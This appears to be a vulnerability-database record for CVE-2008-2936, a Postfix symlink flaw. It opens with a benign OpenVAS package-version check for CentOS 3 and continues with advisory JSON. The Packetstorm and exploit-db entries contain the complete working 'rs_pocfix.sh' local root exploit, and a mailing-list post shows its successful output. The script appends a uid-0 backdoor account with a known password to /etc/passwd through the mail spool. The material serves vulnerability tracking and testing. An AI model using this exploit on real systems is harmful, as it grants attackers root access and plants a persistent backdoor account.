CentOS Update for postfix CESA-2008:0839 centos3 x86_64
2009-02-27T00:00:00
ID OPENVAS:1361412562310880023 Type openvas Reporter Copyright (C) 2009 Greenbone Networks GmbH Modified 2018-04-06T00:00:00
Description
Checks the installed version of the postfix package.
###############################################################################
# OpenVAS Vulnerability Test
#
# CentOS Update for postfix CESA-2008:0839 centos3 x86_64
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
include("revisions-lib.inc");
# Advisory text reused as the "insight" tag in the description block below.
# Per this text, CVE-2008-2936 needs a local user with write access to a mail
# spool directory that has no root mailbox. The package comparison at the end
# of this script does not test either condition.
tag_insight = "Postfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH (SASL),
and TLS.
A flaw was found in the way Postfix dereferences symbolic links. If a local
user has write access to a mail spool directory with no root mailbox, it
may be possible for them to append arbitrary data to files that root has
write permission to. (CVE-2008-2936)
Red Hat would like to thank Sebastian Krahmer for responsibly disclosing
this issue.
All users of postfix should upgrade to these updated packages, which
contain a backported patch that resolves this issue.";
# Product and platform this check applies to (reused as the "affected" tag).
tag_affected = "postfix on CentOS 3";
# Remediation text (reused as the "solution" tag): install the updated packages.
tag_solution = "Please Install the Updated Packages.";
if(description)
{
  # Metadata-only pass: register what this check is, then stop before any
  # host data is read.

  # Identity and revision information.
  script_oid("1.3.6.1.4.1.25623.1.0.880023");
  script_version("$Revision: 9370 $");
  script_name("CentOS Update for postfix CESA-2008:0839 centos3 x86_64");
  script_copyright("Copyright (C) 2009 Greenbone Networks GmbH");
  script_tag(name:"last_modification", value:"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $");
  script_tag(name:"creation_date", value:"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)");

  # Cross-references: CentOS announcement, CESA advisory id and the CVE.
  script_xref(name:"URL", value:"http://lists.centos.org/pipermail/centos-announce/2008-August/015186.html");
  script_xref(name:"CESA", value:"2008:0839");
  script_cve_id("CVE-2008-2936");

  # Severity as a CVSS v2 base score and vector: local access vector, high
  # access complexity, no authentication, complete C/I/A impact.
  script_tag(name:"cvss_base", value:"6.2");
  script_tag(name:"cvss_base_vector", value:"AV:L/AC:H/Au:N/C:C/I:C/A:C");

  # Category, family and prerequisites.
  # NOTE(review): the mandatory keys presumably restrict the check to hosts
  # where an authenticated SSH login produced a CentOS RPM list; confirm
  # against gather-package-list.nasl.
  script_category(ACT_GATHER_INFO);
  script_family("CentOS Local Security Checks");
  script_dependencies("gather-package-list.nasl");
  script_mandatory_keys("ssh/login/centos", "ssh/login/rpms");

  # Report text. qod_type "package" labels the result as package-based, and
  # solution_type "VendorFix" labels the remedy as a vendor update.
  script_tag(name:"summary", value:"Check for the Version of postfix");
  script_tag(name:"affected", value:tag_affected);
  script_tag(name:"solution", value:tag_solution);
  script_tag(name:"insight", value:tag_insight);
  script_tag(name:"qod_type", value:"package");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}
include("pkg-lib-rpm.inc");
# Detection logic: report a finding when isrpmvuln() flags the installed
# postfix RPM against the version string given below.
# NOTE(review): "ssh/login/release" is presumably populated by
# gather-package-list.nasl, which is declared as a dependency above; confirm.
release = get_kb_item("ssh/login/release");
res = "";
# No release string in the knowledge base: nothing to compare, so stop without a result.
if(release == NULL){
exit(0);
}
# Only hosts identified as CentOS 3 are evaluated; any other release falls
# through to the end of the script without a result.
if(release == "CentOS3")
{
# isrpmvuln() is defined in pkg-lib-rpm.inc, which is not shown here. A non-NULL
# return value is passed on unchanged as the finding text. Presumably it is
# non-NULL when the installed postfix is older than 2.0.16-14.1.RHEL3; confirm
# against the library.
if ((res = isrpmvuln(pkg:"postfix", rpm:"postfix~2.0.16~14.1.RHEL3", rls:"CentOS3")) != NULL)
{
security_message(data:res);
exit(0);
}
# NOTE(review): a finding only shows that the fixed package is missing. The
# writable-spool and missing-root-mailbox conditions named in the advisory text
# are not inspected here, so whether the host is exposed needs a separate check.
# __pkg_match is not assigned in this file. It is presumably set by isrpmvuln()
# when a postfix package was found on the host; confirm against pkg-lib-rpm.inc.
if (__pkg_match) exit(99); # Not vulnerable.
exit(0);
}
{"id": "OPENVAS:1361412562310880023", "type": "openvas", "bulletinFamily": "scanner", "title": "CentOS Update for postfix CESA-2008:0839 centos3 x86_64", "description": "Check for the Version of postfix", "published": "2009-02-27T00:00:00", "modified": "2018-04-06T00:00:00", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880023", "reporter": "Copyright (C) 2009 Greenbone Networks GmbH", "references": ["2008:0839", "http://lists.centos.org/pipermail/centos-announce/2008-August/015186.html"], "cvelist": ["CVE-2008-2936"], "lastseen": "2018-04-09T11:40:23", "viewCount": 1, "enchantments": {"score": {"value": 7.3, "vector": "NONE", "modified": "2018-04-09T11:40:23", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-2936", "CVE-2008-0839"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:9222", "SECURITYVULNS:DOC:20429"]}, {"type": "ubuntu", "idList": ["USN-636-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:69542"]}, {"type": "exploitdb", "idList": ["EDB-ID:6337"]}, {"type": "redhat", "idList": ["RHSA-2008:0839"]}, {"type": "oraclelinux", "idList": ["ELSA-2008-0839"]}, {"type": "centos", "idList": ["CESA-2008:0839"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1629-2:3AB83", "DEBIAN:DSA-1629-1:960C3"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:2DEE05799E2429D8CD17202F417BE030"]}, {"type": "seebug", "idList": ["SSV:65680", "SSV:17321"]}, {"type": "cert", "idList": ["VU:938323"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2008-0839.NASL", "DEBIAN_DSA-1629.NASL", "MANDRIVA_MDVSA-2008-171.NASL", "ORACLELINUX_ELSA-2008-0839.NASL", "CENTOS_RHSA-2008-0839.NASL", "SUSE_POSTFIX-5501.NASL", "UBUNTU_USN-636-1.NASL", "SUSE9_12219.NASL", "SUSE_11_0_POSTFIX-080804.NASL", "SL_20080814_POSTFIX_ON_SL3_X.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:870021", "OPENVAS:61434", "OPENVAS:880268", "OPENVAS:1361412562310870021", 
"OPENVAS:61435", "OPENVAS:1361412562310880268", "OPENVAS:840190", "OPENVAS:1361412562310830713", "OPENVAS:880023", "OPENVAS:830713"]}, {"type": "gentoo", "idList": ["GLSA-200808-12"]}, {"type": "suse", "idList": ["SUSE-SA:2008:040"]}, {"type": "fedora", "idList": ["FEDORA:71804208749", "FEDORA:5F8CF208974"]}], "modified": "2018-04-09T11:40:23", "rev": 2}, "vulnersScore": 7.3}, "pluginID": "1361412562310880023", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for postfix CESA-2008:0839 centos3 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Postfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH (SASL),\n and TLS.\n\n A flaw was found in the way Postfix dereferences symbolic links. If a local\n user has write access to a mail spool directory with no root mailbox, it\n may be possible for them to append arbitrary data to files that root has\n write permission to. 
(CVE-2008-2936)\n \n Red Hat would like to thank Sebastian Krahmer for responsibly disclosing\n this issue.\n \n All users of postfix should upgrade to these updated packages, which\n contain a backported patch that resolves this issue.\";\n\ntag_affected = \"postfix on CentOS 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-August/015186.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880023\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2008:0839\");\n script_cve_id(\"CVE-2008-2936\");\n script_name( \"CentOS Update for postfix CESA-2008:0839 centos3 x86_64\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of postfix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.0.16~14.1.RHEL3\", rls:\"CentOS3\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "naslFamily": "CentOS Local Security Checks"}
{"cve": [{"lastseen": "2021-02-02T05:35:14", "description": "Postfix before 2.3.15, 2.4 before 2.4.8, 2.5 before 2.5.4, and 2.6 before 2.6-20080814, when the operating system supports hard links to symlinks, allows local users to append e-mail messages to a file to which a root-owned symlink points, by creating a hard link to this symlink and then sending a message. NOTE: this can be leveraged to gain privileges if there is a symlink to an init script.\nPlease refer to the following links for additional version information (vendor release notes):\r\n\r\n\r\nPostfix 2.3 - ftp://mirrors.loonybin.net/pub/postfix/official/postfix-2.3.15.RELEASE_NOTES\r\n\r\nPostfix 2.4 - ftp://mirrors.loonybin.net/pub/postfix/official/postfix-2.4.8.RELEASE_NOTES\r\n\r\nPostfix 2.5 - ftp://mirrors.loonybin.net/pub/postfix/official/postfix-2.5.4.RELEASE_NOTES\r\n\r\nPostfix 2.6 - ftp://mirrors.loonybin.net/pub/postfix/experimental/postfix-2.6-20080814.RELEASE_NOTES", "edition": 4, "cvss3": {}, "published": "2008-08-18T19:41:00", "title": "CVE-2008-2936", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 1.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.2, "vectorString": "AV:L/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2936"], "modified": "2018-10-11T20:45:00", "cpe": ["cpe:/a:postfix:postfix:2.3.13", "cpe:/a:postfix:postfix:2.3.8", "cpe:/a:postfix:postfix:2.3.1", "cpe:/a:postfix:postfix:2.3.9", "cpe:/a:postfix:postfix:2.4.7", "cpe:/a:postfix:postfix:2.3.5", "cpe:/a:postfix:postfix:2.4.6", "cpe:/a:postfix:postfix:2.3.7", "cpe:/a:postfix:postfix:2.5.1", "cpe:/a:postfix:postfix:2.5.2", 
"cpe:/a:postfix:postfix:2.5.0", "cpe:/a:postfix:postfix:2.3.0", "cpe:/a:postfix:postfix:2.4.4", "cpe:/a:postfix:postfix:2.3.2", "cpe:/a:postfix:postfix:2.5.3", "cpe:/a:postfix:postfix:2.4.3", "cpe:/a:postfix:postfix:2.3.10", "cpe:/a:postfix:postfix:2.3.14", "cpe:/a:postfix:postfix:2.3.3", "cpe:/a:postfix:postfix:2.3.4", "cpe:/a:postfix:postfix:2.3.11", "cpe:/a:postfix:postfix:2.4.0", "cpe:/a:postfix:postfix:2.3.12", "cpe:/a:postfix:postfix:2.4.5", "cpe:/a:postfix:postfix:2.3.6", "cpe:/a:postfix:postfix:2.6.0", "cpe:/a:postfix:postfix:2.4.1", "cpe:/a:postfix:postfix:2.4.2"], "id": "CVE-2008-2936", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2936", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:postfix:postfix:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.3.13:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.3.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:postfix:postfix:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.3.2:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:27", "bulletinFamily": "software", "cvelist": ["CVE-2008-2936"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nHello,\r\n\r\nThe recent vulnerability in Postfix discovered by Sebastian Krahmer is\r\ntrivially exploitable when certain preconditions are met. Nevertheless,\r\nit's very difficult to find such conditions in a real-world scenario. I\r\nwrote this exploit for fun and to demonstrate that. I also hope it helps\r\nsysadmins to check and test their systems.\r\n\r\nI used an Ubuntu/Debian (IA32) system which *I had to make vulnerable on\r\npurpose*. The tweaks were:\r\n- - #1: make the spool writable to attacker\r\nchmod o+w /var/mail\r\n- - #2: disable mail aliases (LDA should be able to deliver mail directly to\r\n"root" mailbox)\r\n- - #3: use "local" postfix process as LDA\r\n\r\nPerhaps condition #1 is the most difficult to meet, for a normal\r\n(non-privileged) user. But think about a privilege escalation if you manage\r\nto get into the "mail" group first (spool dir is tipically writable by\r\nmembers of "mail" group).\r\n\r\nFor #2, it depends on configuration, but Ubuntu/Debian usually creates an\r\nalias for "root", so that mail is delivered to a non-root account (and\r\nmaking the system non vulnerable to this exploit).\r\n\r\nWhen installing Postfix, you are asked to choose a local delivery agent\r\n(LDA). 
I found one of my test systems using procmail (not vulnerable) and\r\nanother one using postfix built-in LDA (vulnerable).\r\n\r\nFor a quick test, normally, it will be sufficient to append the following\r\nlines to /etc/postfix/main.cf:\r\nalias_maps =\r\nmailbox_command =\r\n(left blank intentionally)\r\n\r\nFinally, postfix should be refreshed:\r\npostfix reload\r\n\r\nThere are other preconditions like:\r\n- - #4: postfix should not be using maildir-style mailboxes\r\n- - #5: mailbox for "root" should not exist (or at least you should have\r\npermission to delete it, which is not always possible, even when #1 is true)\r\n\r\nMy script tries to do its best to check for these conditions (postfix\r\nconfig is very flexible, I only checked some typical parameters). Feel free\r\nto write me for corrections, etc.\r\n\r\n==============\r\n\r\nroman@jupiter:~$ wget http://www.rs-labs.com/exploitsntools/rs_pocfix.sh\r\nroman@jupiter:~$ chmod a+x rs_pocfix.sh\r\nroman@jupiter:~$ ./rs_pocfix.sh\r\n#\r\n# "rs_pocfix.sh" (PoC for Postfix local root vulnerability: CVE-2008-2936)\r\n# by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt <roman@rs-labs.com>\r\n#\r\n# Tested: Ubuntu / Debian\r\n#\r\n# [ Madrid, 30.Aug.2008 ]\r\n#\r\n[*] Postfix seems to be installed\r\n[*] Hardlink to symlink not dereferenced\r\n[*] Spool dir is writable\r\n[*] Backed up: /etc/passwd (saved as "/tmp/pocfix_target_backup.18107")\r\n[*] Sending mail (3 seconds wait)\r\n[*] Exploit successful (appended data to /etc/passwd). Now "su dsr", pass\r\nis "dsrrocks")\r\nroman@jupiter:~$ su dsr\r\nPassword:\r\nsh-3.1#\r\n\r\n==============\r\n\r\nPS: I didn't find Wietse's nice advisory [1] on postfix.org site (or at\r\nleast, if it exists, it's not easy to find it). Although it seems that some\r\nnon-POSIX issues in OS are contributing to the vulnerability, IMHO it's a\r\n(low-medium risk) vulnerability in Postfix and it deserves to be listed on\r\npostfix page. 
Despite this issue, Postfix continues being one of the best\r\nmail server software ever made and my favourite MTA.\r\n\r\n[1] http://article.gmane.org/gmane.mail.postfix.announce/110\r\n\r\n- --\r\n\r\nCheers,\r\n- -Roman\r\n\r\nPGP Fingerprint:\r\n09BB EFCD 21ED 4E79 25FB 29E1 E47F 8A7D EAD5 6742\r\n[Key ID: 0xEAD56742. Available at KeyServ]\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.7 (MingW32)\r\n\r\niD8DBQFIunoI5H+KferVZ0IRAkBrAKCwgHV+6O+At5Hw0dsYs8kYJZQjZACeJ96a\r\nWw7gCuqOt32rA2HhiTuKeRk=\r\n=oo87\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2008-09-02T00:00:00", "published": "2008-09-02T00:00:00", "id": "SECURITYVULNS:DOC:20429", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20429", "title": "PoCfix (PoC for Postfix local root vuln - CVE-2008-2936)", "type": "securityvulns", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:30", "bulletinFamily": "software", "cvelist": ["CVE-2008-2937", "CVE-2008-2936"], "description": "It's possible to cause Postfix to deliver mail to system file by using hardlinks to symlink (available against standard in Linux, IRIX, Solaris).", "edition": 1, "modified": "2008-09-02T00:00:00", "published": "2008-09-02T00:00:00", "id": "SECURITYVULNS:VULN:9222", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9222", "title": "Postfix mail server hardlinks privilege escalation", "type": "securityvulns", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-09T00:22:22", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2936"], "description": "Sebastian Krahmer discovered that Postfix was not correctly handling \nmailbox ownership when dealing with Linux's implementation of hardlinking \nto symlinks. In certain mail spool configurations, a local attacker \ncould exploit this to append data to arbitrary files as the root user. 
\nThe default Ubuntu configuration was not vulnerable.", "edition": 5, "modified": "2008-08-19T00:00:00", "published": "2008-08-19T00:00:00", "id": "USN-636-1", "href": "https://ubuntu.com/security/notices/USN-636-1", "title": "Postfix vulnerability", "type": "ubuntu", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:11:54", "description": "", "published": "2008-08-31T00:00:00", "type": "packetstorm", "title": "rs_pocfix.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2936"], "modified": "2008-08-31T00:00:00", "id": "PACKETSTORM:69542", "href": "https://packetstormsecurity.com/files/69542/rs_pocfix.txt.html", "sourceData": "`#!/bin/sh \n# \n# \"rs_pocfix.sh\" (PoC for Postfix local root vulnerability: CVE-2008-2936) \n# by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt <roman@rs-labs.com> \n# \n# Tested: Ubuntu / Debian \n# \n# [ Madrid, 30.Aug.2008 ] \n# \n \n# Config \n \nwritable_dir=/tmp \nspool_dir=/var/mail # Use \"postconf mail_spool_directory\" to obtain this \nuser=root \ntarget=/etc/passwd \nuseful_link=/usr/bin/atq # lrwxrwxrwx 2 root root 2 2007-05-04 22:15 /usr/bin/atq -> at \nuseful_link_dst=at # Tip: find / -type l -uid 0 -print -exec ls -l {} \\; | less \nseconds=3 \nuser_in_passwd=\"dsr:3GsXLdEaKaGnM:0:0:root:/root:/bin/sh\" # Pass is \"dsrrocks\" \npostfix=`which postfix` # /usr/sbin/postfix \npostconf=/usr/sbin/postconf \npostmap=/usr/sbin/postmap \n \n \n# Funcs \n \nquit() \n{ \necho \"$1\" \nexit \n} \n \n \n# Step 1: is my system vulnerable? \n \nhead -n 9 $0 | tail -n 8 \nif [ $postfix ] ; then \necho \"[*] Postfix seems to be installed\" \nelse \nquit \"[!] 
Are you sure Postfix is installed?\" \nfi \n \nmkdir -p $writable_dir/pocfix \ntouch $writable_dir/pocfix/src \nln -s $writable_dir/pocfix/src $writable_dir/pocfix/dst1 \nln $writable_dir/pocfix/dst1 $writable_dir/pocfix/dst2 \n \nif [ -L $writable_dir/pocfix/dst2 ] ; then \necho \"[*] Hardlink to symlink not dereferenced\" \nrm -rf $writable_dir/pocfix \nelse \nrm -rf $writable_dir/pocfix \nquit \"[!] Hardlink to symlink correctly dereferenced. System is not vulnerable\" \nfi \n \nif [ -d $spool_dir -a -w $spool_dir ] ; then \necho \"[*] Spool dir is writable\" \nelse \nquit \"[!] Spool dir is not writable\" \nfi \n \nif [ -e $spool_dir/$user ] ; then \nrm -f $spool_dir/$user \necho \"[*] Mailbox for \\\"$user\\\" found. Trying to delete it\" \n \nif [ -e $spool_dir/$user ] ; then \nquit \"[!] Couldn't delete it\" \nelse \necho \"[*] Deletion ok\" \nfi \n \nfi \n \nif [ -e $spool_dir/$useful_link_dst ] ; then \nrm -f $spool_dir/$useful_link_dst \necho \"[*] Mailbox for \\\"$useful_link_dst\\\" found. Trying to delete it\" \n \nif [ -e $spool_dir/$useful_link_dst ] ; then \nquit \"[!] Couldn't delete it\" \nelse \necho \"[*] Deletion ok\" \nfi \n \nfi \n \naliases=`$postconf alias_database | cut -d\"=\" -f2` \n$postconf alias_maps | grep -q $aliases \nif [ $? -eq 0 ] ; then \nif [ $aliases ] ; then \n$postmap -q $user $aliases > /dev/null \nif [ $? -eq 0 ] ; then \nquit \"[!] Mail alias for \\\"$user\\\" exists\" \nfi \nfi \nfi \n \nlda=`$postconf mailbox_command | cut -d\"=\" -f2` \nif [ $lda ] ; then \nquit \"[!] Non-Postfix LDA detected\" \nfi \n \n$postconf home_mailbox | grep -q '/$' \nif [ $? -eq 0 ] ; then \nquit \"[!] Maildir-style mailbox detected\" \nfi \n \n \n# Step 2: Exploiting \n \nln -f $useful_link $spool_dir/$user 2> /dev/null || quit \"[!] Couldn't create hardlink (different partitions?)\" \nln -s -f $target $spool_dir/$useful_link_dst 2> /dev/null || quit \"[!] 
Couldn't create symlink pointing to target file\" \ncp -f $target $writable_dir/pocfix_target_backup.$$ && echo \"[*] Backed up: $target (saved as \\\"$writable_dir/pocfix_target_backup.$$\\\")\" \necho \"[*] Sending mail ($seconds seconds wait)\" \necho $user_in_passwd | /usr/sbin/sendmail $user \n \nsleep $seconds \n \ndiff -q $target $writable_dir/pocfix_target_backup.$$ > /dev/null \n \nif [ $? -eq 0 ] ; then \necho \"[!] Exploit failed\" \nelse \necho \"[*] Exploit successful (appended data to $target). Now \\\"su dsr\\\", pass is \\\"dsrrocks\\\")\" \nfi \n \nrm -f $spool_dir/$user \nrm -f $spool_dir/$useful_link_dst \n \n`\n", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/69542/rs_pocfix.txt"}], "exploitdb": [{"lastseen": "2016-02-01T00:40:12", "description": "Postfix. CVE-2008-2936. Local exploit for linux platform", "published": "2008-08-31T00:00:00", "type": "exploitdb", "title": "Postfix <= 2.6-20080814 - symlink Local Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2936"], "modified": "2008-08-31T00:00:00", "id": "EDB-ID:6337", "href": "https://www.exploit-db.com/exploits/6337/", "sourceData": "#!/bin/sh\r\n#\r\n# \"rs_pocfix.sh\" (PoC for Postfix local root vulnerability: CVE-2008-2936)\r\n# by Roman Medina-Heigl Hernandez a.k.a. 
RoMaNSoFt <roman@rs-labs.com>\r\n#\r\n# Tested: Ubuntu / Debian\r\n#\r\n# [ Madrid, 30.Aug.2008 ]\r\n#\r\n\r\n# Config\r\n\r\nwritable_dir=/tmp\r\nspool_dir=/var/mail\t\t# Use \"postconf mail_spool_directory\" to obtain this\r\nuser=root\r\ntarget=/etc/passwd\r\nuseful_link=/usr/bin/atq\t# lrwxrwxrwx 2 root root 2 2007-05-04 22:15 /usr/bin/atq -> at\r\nuseful_link_dst=at\t\t# Tip: find / -type l -uid 0 -print -exec ls -l {} \\; | less\r\nseconds=3\r\nuser_in_passwd=\"dsr:3GsXLdEaKaGnM:0:0:root:/root:/bin/sh\" # Pass is \"dsrrocks\"\r\npostfix=`which postfix`\t\t# /usr/sbin/postfix\r\npostconf=/usr/sbin/postconf\r\npostmap=/usr/sbin/postmap\r\n\r\n\r\n# Funcs\r\n\r\nquit()\r\n{\r\n echo \"$1\"\r\n exit\r\n}\r\n\r\n\r\n# Step 1: is my system vulnerable?\r\n\r\nhead -n 9 $0 | tail -n 8\r\nif [ $postfix ] ; then\r\n echo \"[*] Postfix seems to be installed\"\r\nelse\r\n quit \"[!] Are you sure Postfix is installed?\"\r\nfi\r\n\r\nmkdir -p $writable_dir/pocfix\r\ntouch $writable_dir/pocfix/src\r\nln -s $writable_dir/pocfix/src $writable_dir/pocfix/dst1\r\nln $writable_dir/pocfix/dst1 $writable_dir/pocfix/dst2\r\n\r\nif [ -L $writable_dir/pocfix/dst2 ] ; then\r\n echo \"[*] Hardlink to symlink not dereferenced\"\r\n rm -rf $writable_dir/pocfix\r\nelse\r\n rm -rf $writable_dir/pocfix\r\n quit \"[!] Hardlink to symlink correctly dereferenced. System is not vulnerable\"\r\nfi\r\n\r\nif [ -d $spool_dir -a -w $spool_dir ] ; then\r\n echo \"[*] Spool dir is writable\"\r\nelse\r\n quit \"[!] Spool dir is not writable\"\r\nfi\r\n\r\nif [ -e $spool_dir/$user ] ; then\r\n rm -f $spool_dir/$user\r\n echo \"[*] Mailbox for \\\"$user\\\" found. Trying to delete it\"\r\n\r\n if [ -e $spool_dir/$user ] ; then\r\n quit \"[!] Couldn't delete it\"\r\n else\r\n echo \"[*] Deletion ok\"\r\n fi\r\n\r\nfi\r\n\r\nif [ -e $spool_dir/$useful_link_dst ] ; then\r\n rm -f $spool_dir/$useful_link_dst\r\n echo \"[*] Mailbox for \\\"$useful_link_dst\\\" found. 
